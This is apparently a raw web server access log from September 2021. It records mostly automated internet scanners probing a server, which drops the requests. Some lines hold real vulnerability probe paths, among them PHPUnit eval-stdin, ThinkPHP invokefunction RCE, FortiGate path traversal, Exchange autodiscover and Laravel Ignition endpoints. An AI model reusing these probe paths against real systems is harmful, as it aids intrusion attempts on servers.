[11/Sep/2021:10:23:42 +0000] 444 - GET https localhost "/" [Client 109.248.6.126] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [11/Sep/2021:10:25:57 +0000] 444 - GET https smtp.moralanimal.net "/" [Client 92.118.160.41] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [11/Sep/2021:10:41:01 +0000] 444 - GET https 64.22.31.253 "/remote/login" [Client 128.14.209.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Sep/2021:12:15:36 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.218.45] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Sep/2021:12:25:40 +0000] 400 - - http localhost "-" [Client 194.165.16.41] [Length 154] [Gzip -] "-" "-" [11/Sep/2021:14:32:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 42.193.23.161] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [11/Sep/2021:14:32:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 42.193.23.161] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [11/Sep/2021:14:33:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 42.193.23.161] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [11/Sep/2021:14:34:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 42.193.23.161] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [11/Sep/2021:14:34:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 42.193.23.161] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [11/Sep/2021:14:34:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 42.193.23.161] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [11/Sep/2021:15:59:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.155] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [11/Sep/2021:15:59:31 +0000] 400 - - https localhost "-" [Client 209.127.17.242] [Length 154] [Gzip -] "-" "-" [11/Sep/2021:15:59:32 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.101.142] [Length 0] [Gzip -] "-" "-" [11/Sep/2021:15:59:45 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 77.247.181.165] [Length 0] [Gzip -] "-" "-" [11/Sep/2021:17:01:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [11/Sep/2021:17:16:03 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Sep/2021:17:16:03 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Sep/2021:17:16:03 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Sep/2021:17:16:03 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Sep/2021:17:16:03 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Sep/2021:17:16:03 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Sep/2021:20:37:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Sep/2021:21:58:12 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [11/Sep/2021:21:58:13 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:21:58:13 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:21:58:15 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:21:58:15 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:21:58:17 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:21:58:20 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:21:58:21 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:21:58:22 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:21:58:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:21:58:23 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:21:58:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:23:35:27 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.216.148] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Sep/2021:23:57:56 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 198.199.101.75] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Sep/2021:23:59:30 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.216.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Sep/2021:00:00:51 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 198.199.112.66] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Sep/2021:00:00:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 88.9.119.217] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Sep/2021:00:44:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Sep/2021:01:08:54 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 45.143.200.58] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [12/Sep/2021:01:16:20 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 91.132.58.162] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [12/Sep/2021:01:39:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [12/Sep/2021:01:39:47 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [12/Sep/2021:03:36:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.2] [Length 0] [Gzip -] "-" "-" [12/Sep/2021:06:27:35 +0000] 444 - GET https 139.162.113.11 "/" [Client 208.85.92.139] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0.2) Gecko/20100101 Firefox/59.0.2" "-" [12/Sep/2021:07:02:55 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [12/Sep/2021:07:02:56 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [12/Sep/2021:07:02:56 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [12/Sep/2021:07:04:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.205.250] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Sep/2021:07:19:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [12/Sep/2021:08:10:53 +0000] 400 - GET http localhost "/" [Client 47.114.106.188] [Length 154] [Gzip -] "-" "-" [12/Sep/2021:09:08:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 143.110.220.80] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" [12/Sep/2021:09:08:10 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 143.110.220.80] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" [12/Sep/2021:09:08:11 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 143.110.220.80] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" [12/Sep/2021:09:54:41 +0000] 444 - GET https 64.22.31.253 "/UI/Dashboard" [Client 92.118.160.17] [Length 0] [Gzip -] "Go http package" "-" [12/Sep/2021:10:51:56 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [12/Sep/2021:10:51:57 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [12/Sep/2021:10:51:57 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [12/Sep/2021:10:59:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 185.189.13.185] [Length 252] [Gzip -] "-" "-" [12/Sep/2021:11:51:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 161.35.197.86] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0; vivo 1713 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36" "-" [12/Sep/2021:12:18:33 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.216.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Sep/2021:13:04:41 +0000] 400 - POST http 192.168.204.159 "/" [Client 188.166.62.103] [Length 252] [Gzip -] "WinHttpClient" "-" [12/Sep/2021:14:51:51 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Sep/2021:14:51:51 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Sep/2021:14:51:53 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [12/Sep/2021:14:51:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Sep/2021:14:51:54 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Sep/2021:14:51:54 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Sep/2021:14:51:55 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Sep/2021:14:51:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Sep/2021:14:51:57 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Sep/2021:14:51:58 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Sep/2021:14:51:58 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Sep/2021:14:52:01 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Sep/2021:15:23:49 +0000] 444 - GET https 64.22.31.253 "/owa/auth.owa" [Client 141.98.83.139] [Length 0] [Gzip -] "Spider" "-" [12/Sep/2021:17:01:55 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Sep/2021:17:01:55 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Sep/2021:17:01:55 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Sep/2021:17:01:55 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Sep/2021:17:01:55 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Sep/2021:17:01:55 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Sep/2021:18:53:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Sep/2021:19:08:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [12/Sep/2021:20:17:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 3.93.144.90] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/58.0.3073.72 Safari/537.32" "-" [12/Sep/2021:20:17:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 3.93.144.90] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/58.0.3073.72 Safari/537.32" "-" [12/Sep/2021:20:50:56 +0000] 400 - GET http localhost "/" [Client 47.107.159.123] [Length 154] [Gzip -] "-" "-" [12/Sep/2021:22:11:19 +0000] 444 - GET https oauth.moralanimal.net "/" [Client 61.135.15.178] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4472.114 Mobile Safari/537.36" "-" [12/Sep/2021:23:36:36 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.210.129] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Sep/2021:23:52:13 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7ad-imcjapan-syosyaman-xkgi3lqg03!wgz" "-" [12/Sep/2021:23:52:13 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.9 (KHTML, like Gecko) Chrome/7.0.531.0 Safari/534.9" "-" [12/Sep/2021:23:52:13 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [12/Sep/2021:23:58:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [13/Sep/2021:00:01:52 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 198.199.101.75] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Sep/2021:00:04:37 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.216.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Sep/2021:00:05:11 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.213.28] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Sep/2021:00:07:00 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.216.87] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Sep/2021:00:50:59 +0000] 444 - GET https help.moralanimal.net "/" [Client 92.118.160.41] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [13/Sep/2021:01:04:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.79.204.46] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [13/Sep/2021:01:26:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.92] [Length 0] [Gzip -] "-" "-" [13/Sep/2021:04:09:01 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 92.118.160.41] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [13/Sep/2021:05:02:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.44] [Length 0] [Gzip -] "-" "-" [13/Sep/2021:05:02:39 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.44] [Length 252] [Gzip -] "-" "-" [13/Sep/2021:05:02:39 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.44] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [13/Sep/2021:05:18:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [13/Sep/2021:05:26:46 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Sep/2021:05:47:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [13/Sep/2021:06:37:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [13/Sep/2021:07:11:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.218.14] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Sep/2021:07:17:31 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 13.58.123.234] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [13/Sep/2021:08:21:04 +0000] 444 - POST https confluence.moralanimal.net "/pages/createpage-entervariables.action?SpaceKey=x" [Client 162.255.202.246] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1" "-" [13/Sep/2021:09:03:29 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 91.191.209.164] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "-" [13/Sep/2021:10:12:13 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 45.95.147.19] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.el7.x86_64" "-" [13/Sep/2021:10:15:04 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [13/Sep/2021:11:15:31 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Sep/2021:11:15:33 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Sep/2021:11:15:33 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Sep/2021:11:15:34 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 